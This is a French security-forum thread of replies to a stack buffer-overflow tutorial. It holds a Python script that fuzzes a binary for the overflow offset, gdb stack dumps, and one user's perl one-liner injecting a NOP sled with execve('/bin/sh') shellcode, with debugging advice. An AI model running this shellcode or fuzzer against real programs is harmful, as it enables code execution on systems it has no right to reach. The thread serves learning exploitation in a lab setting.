Buffer overflow, Votre première exploitation

***Di0Sasm*** · 11-02-2012, 02h56

Très bon tutoriel, très bien expliqué.

fr0g · 12-02-2012, 20h35

Merci, si certains ont des améliorations à apporter au tuto, je suis preneur Smile

Trivial · 18-06-2013, 22h05

Je vais remonter le thread, mais ce n'est pas grave.. Ce tuto vaut la peine d'être lu :-)

Merci à toi de partager Smile

Satyr · 18-06-2013, 23h31

Code :
# --------------------------------------------------------------------------------------------------------------------------------------

#coding=utf-8

#

# Desc : Petit script (faisant partie d\'un de mes projets actuels)

# effectuant un test un peu (beaucoup) bourrin afin de verifier

# la présence ou non d\'une faille de Stack Overflow

# dans l\'argument principal dans un executable quelconque.

import os

import commands

import sys

# --------------------------------------------------Class (color)

class bcolors:

HEADER = '\033[36m'

OKBLUE = '\033[94m'

OKGREEN = '\033[92m'

WARNING = '\033[31m'

ENDC = '\033[0m'

# -------------------------------------------------FONCTIONS

def header():

    os.system('clear')

    print bcolors.HEADER + """

- E.X.P.S.T.A.C.K -

[*] Author : fr0g

[*] WebSite : http://hwc-crew.com

[*] Th'x : Storn

    """+ bcolors.ENDC

def exp(cible):

    compteur = 1

    cmd = str("./"+str(cible)+" `python -c \"print "+str(compteur)+"*'\x90'\"`")

    rep = commands.getoutput(cmd)

    while (rep != "Segmentation fault"):

            header()

            compteur += 1

            print bcolors.OKBLUE + "[*] App : " + str(cible) +bcolors.ENDC

            print  bcolors.OKGREEN + "\n[*] Inject : " + str(compteur) + " Bytes" +  bcolors.ENDC

            cmd = str("./"+str(cible)+" `python -c \"print "+str(compteur)+"*'\x90'\"`")

            rep = commands.getoutput(cmd)

    print bcolors.WARNING + "\n[!] Stack Overflow at : " + str(compteur) + " Bytes in the buffer \n\n"+bcolors.ENDC

#--------------------------------------------------------Start here

if (len(sys.argv) < 2):

    print bcolors.WARNING + "\n[*] Where is your f*ckin binary ? \n[*] Use : ./findstackof [app] \n" + bcolors.ENDC

else:

    header()

    if (os.path.isfile(sys.argv[1])):

            try:  

                    exp(sys.argv[1])

            except:

                    print bcolors.WARNING + "\n Error" + bcolors.ENDC

    else:

            print bcolors.WARNING + "\n Error : Unknown file ..." + bcolors.ENDC

#----------------------------------------------------------------------------------------------------------------------------------------

Doit être remplacé par :

Code :
# --------------------------------------------------------------------------------------------------------------------------------------

#coding=utf-8

#

# Desc : Petit script (faisant partie d\'un de mes projets actuels)

# effectuant un test un peu (beaucoup) bourrin afin de verifier

# la présence ou non d\'une faille de Stack Overflow

# dans l\'argument principal dans un executable quelconque.

import os

import commands

import sys

# --------------------------------------------------Class (color)

class bcolors:

    HEADER = '\033[36m'

    OKBLUE = '\033[94m'

    OKGREEN = '\033[92m'

    WARNING = '\033[31m'

    ENDC = '\033[0m'

# -------------------------------------------------FONCTIONS

def header():

    os.system('clear')

    print bcolors.HEADER + """

- E.X.P.S.T.A.C.K -

[*] Author : fr0g

[*] WebSite : http://hwc-crew.com

[*] Th'x : Storn

    """+ bcolors.ENDC

def exp(cible):

    compteur = 1

    cmd = str("./"+str(cible)+" `python -c \"print "+str(compteur)+"*'\x90'\"`")

    rep = commands.getoutput(cmd)

    while (rep != "Segmentation fault"):

            header()

            compteur += 1

            print bcolors.OKBLUE + "[*] App : " + str(cible) +bcolors.ENDC

            print  bcolors.OKGREEN + "\n[*] Inject : " + str(compteur) + " Bytes" +  bcolors.ENDC

            cmd = str("./"+str(cible)+" `python -c \"print "+str(compteur)+"*'\x90'\"`")

            rep = commands.getoutput(cmd)

    print bcolors.WARNING + "\n[!] Stack Overflow at : " + str(compteur) + " Bytes in the buffer \n\n"+bcolors.ENDC

#--------------------------------------------------------Start here

if (len(sys.argv) < 2):

    print bcolors.WARNING + "\n[*] Where is your f*ckin binary ? \n[*] Use : ./findstackof [app] \n" + bcolors.ENDC

else:

    header()

    if (os.path.isfile(sys.argv[1])):

            try:  

                    exp(sys.argv[1])

            except:

                    print bcolors.WARNING + "\n Error" + bcolors.ENDC

    else:

            print bcolors.WARNING + "\n Error : Unknown file ..." + bcolors.ENDC

#----------------------------------------------------------------------------------------------------------------------------------------

La seule différence est sur la structure bcolors ou tu na pas indenté correctement les éléments ^^

Cordialement Satyr.

fr0g · 19-06-2013, 02h25

Satyr : surement un blem du copy/paste sur le forum , merci bien Smile

CronosDark · 20-06-2013, 08h20

Merci pour le tutoriel.
Il est bien fait! =)

Hypnoze57 · (Modification du message : 20-05-2014, 10h15 par Hypnoze57.)

J'ai une question, mon seg fault commence à 256 octets et pas 272, pourquoi? (Je précise que je suis en 64 bits (eip = rip chez moi))

pas à 264*

gruik · 20-05-2014, 10h36

(20-05-2014, 10h15)Hypnoze57 a écrit : J'ai une question, mon seg fault commence à 256 octets et pas 272, pourquoi?

parceque le binaire ^^
tu devrais regarder dedans comment le programme déclare ton buffer et ce qu'il fait avec la stack exactement

Hypnoze57 · 20-05-2014, 10h38

et j'en profite aussi pour vous demandez pourquoi je n'ai aucune adresse qui "tombe dans les NOPS"

Code :
Program received signal SIGSEGV, Segmentation fault.

0x0000000044434241 in ?? ()

(gdb) x/64x $rsp

0x7fffffffe520:    0xffffe618    0x00007fff    0x00000000    0x00000002

0x7fffffffe530:    0x00000000    0x00000000    0xf7a70ead    0x00007fff

0x7fffffffe540:    0x00000000    0x00000000    0xffffe618    0x00007fff

0x7fffffffe550:    0x00000000    0x00000002    0x004005d3    0x00000000

0x7fffffffe560:    0x00000000    0x00000000    0x8a3bc84d    0xc0043179

0x7fffffffe570:    0x00400490    0x00000000    0xffffe610    0x00007fff

0x7fffffffe580:    0x00000000    0x00000000    0x00000000    0x00000000

0x7fffffffe590:    0x40bbc84d    0x3ffbce86    0x96ebc84d    0x3ffbde37

0x7fffffffe5a0:    0x00000000    0x00007fff    0x00000000    0x00000000

0x7fffffffe5b0:    0x00000000    0x00000000    0x00400630    0x00000000

0x7fffffffe5c0:    0xffffe618    0x00007fff    0x00000002    0x00000000

0x7fffffffe5d0:    0x00000000    0x00000000    0x00000000    0x00000000

0x7fffffffe5e0:    0x00400490    0x00000000    0xffffe610    0x00007fff

0x7fffffffe5f0:    0x00000000    0x00000000    0x004004b9    0x00000000

0x7fffffffe600:    0xffffe608    0x00007fff    0x0000001c    0x00000000

0x7fffffffe610:    0x00000002    0x00000000    0xffffe8e6    0x00007fff

(Je précise que j'ai run avec en arg `perl -e 'print "\x90"x264 . "ABCD"'`)

gruik · 20-05-2014, 10h46

t'as essayé de regarder avant 0x7fffffffe520 et apres 0x7fffffffe610 ?

Hypnoze57 · 20-05-2014, 10h56

Merci pour tes réponses gruik ! J'ai regarder un peu mon programme effectivement si je ne me trompe pas, 0x00000000004005b5 <+25>: lea -0x100(%rbp),%rax = 254 octets
Par contre, pour ma seconde question (qui est très bloquante) j'ai regarder après mais je ne sais pas comment regarder avant, une idée?
Le premier que je trouve se situe à 0x7fffffffe910 c'est bizarre non?

gruik · 20-05-2014, 11h14

(20-05-2014, 10h56)Hypnoze57 a écrit : si je ne me trompe pas, 0x00000000004005b5 <+25>: lea -0x100(%rbp),%rax = 254 octets

raté

0x100 = 256

Citation :Par contre, pour ma seconde question (qui est très bloquante) j'ai regarder après mais je ne sais pas comment regarder avant, une idée?

Code :
(gdb) x/64x $rsp - 256

(gdb) x/64x $rsp - 512

(gdb) x/64x $rsp - 768

etc.

pour rappel "x/64x" on dump 64 dwords en hexadecimal, un dword c'est 4 octets dont 64x4 = 256, chaque "page" qu'on affiche on recule de 256
on a tout interet à s'arranger avec gdb et rendre ça aussi pratique que possible hein :

Code :
(gdb) x/128x $rsp - (512*0)

(gdb) x/128x $rsp - (512*1)

(gdb) x/128x $rsp - (512*2)

etc.

Hypnoze57 · 20-05-2014, 12h48

Merci pour tes réponses, effectivement mes nops commencent plus haut c'est peut être la source de mon problème (vu que j'essayé plus bas) je vous tiendrai au courant de mes avancées

Hypnoze57 · (Modification du message : 20-05-2014, 15h28 par Hypnoze57.)

Hum je ne comprends pas pourquoi ceci ne fonctionne pas.. :

Code :
w00t@debian:~/applicatif/buffer_overflow$ ./fr0g `perl -e 'print "\x90"x237 . "\x99\x31\xc0\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1​\xb0\x0b\xcd\x80" . "\x10\xe4\xff\xff\xff\x7f"'`

Fermeture du programme ...

Erreur de segmentation (core dumped)

w00t@debian:~/applicatif/buffer_overflow$ gdb -c core 

GNU gdb (GDB) 7.4.1-debian

Copyright (C) 2012 Free Software Foundation, Inc.

License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software: you are free to change and redistribute it.

There is NO WARRANTY, to the extent permitted by law.  Type "show copying"

and "show warranty" for details.

This GDB was configured as "x86_64-linux-gnu".

For bug reporting instructions, please see:

<http://www.gnu.org/software/gdb/bugs/>.

[New LWP 7403]

Core was generated by `./fr0g ������������������������������������������������������������������������'.

Program terminated with signal 11, Segmentation fault.

#0  0x00007fffffffe410 in ?? ()

(gdb) i r

rax            0x1b    27

rbx            0x0    0

rcx            0x7ffff7b22160    140737349034336

rdx            0x7ffff7dd8e10    140737351880208

rsi            0x7ffff7ff8000    140737354104832

rdi            0xffffffff    4294967295

rbp            0x80cd0bb08b80e2e1    0x80cd0bb08b80e2e1

rsp            0x7fffffffe570    0x7fffffffe570

r8             0xffffffff    4294967295

r9             0x0    0

r10            0x22    34

r11            0x246    582

r12            0x400490    4195472

r13            0x7fffffffe660    140737488348768

r14            0x0    0

r15            0x0    0

rip            0x7fffffffe410    0x7fffffffe410

eflags         0x10206    [ PF IF RF ]

cs             0x33    51

ss             0x2b    43

ds             0x0    0

es             0x0    0

fs             0x0    0

gs             0x0    0

rip est bien réecrit avec la bonne adresse mémoire (trouvé avec gdb avec x/64x $rsp -512)
Pourquoi j'ai un seg fault et ne suis pas redirigé vers /bin/sh?

J'ai peu être identifier le problème, je regardai le fichier core alors qu'en le faisant directement dans gdb avec 236 j'ai 2 caractères qui manque dans mon adresse (comme fr0g d'ailleur) et avec 237 sous gdb l'adresse change pas mal..
Adresse à obtenir: 0x7fffffffe410
rip avec 236 (sous gdb ET fichier core) : 0x7fffffffe4
rip avec 237 (sous gdb) : 0x7fffffffe50b
rip avec 237 (fichier core) : 0x7fffffffe410 (Bonne adresse !!)
Auriez-vous des idées?

gruik · 20-05-2014, 15h33

(20-05-2014, 14h36)Hypnoze57 a écrit : Hum je ne comprends pas pourquoi ceci ne fonctionne pas..

moi non plus. par contre viens plutôt poser tes questions/demander de l'aide sur irc, on dérive un peu trop du thread initial et si chaque personne qui galère sur un overflow faisait comme toi imagine la tête du thread Wink

Hypnoze57 · 20-05-2014, 15h50

Effectivement je passerai sur l'irc, merci en tout cas !

**ark** · 20-05-2014, 18h04

Yo, comme ca en passant, je dirais que tu jump bien a la bonne adresse, mais que t'aurais oublié de passer ta stack en executable (avec execstack), nan ?

hackline · 02-11-2016, 21h24

vraiment intéressant, je suis nouveau dans tout ce qui est BOF, mais franchement, là, tutoriel de qualité, bien organisé, bien expliqué, avec une pointe d'humour, j'adore

Identifiant Mot de passe
S’enregistrer \| Mot de passe oublié ? Se rappeler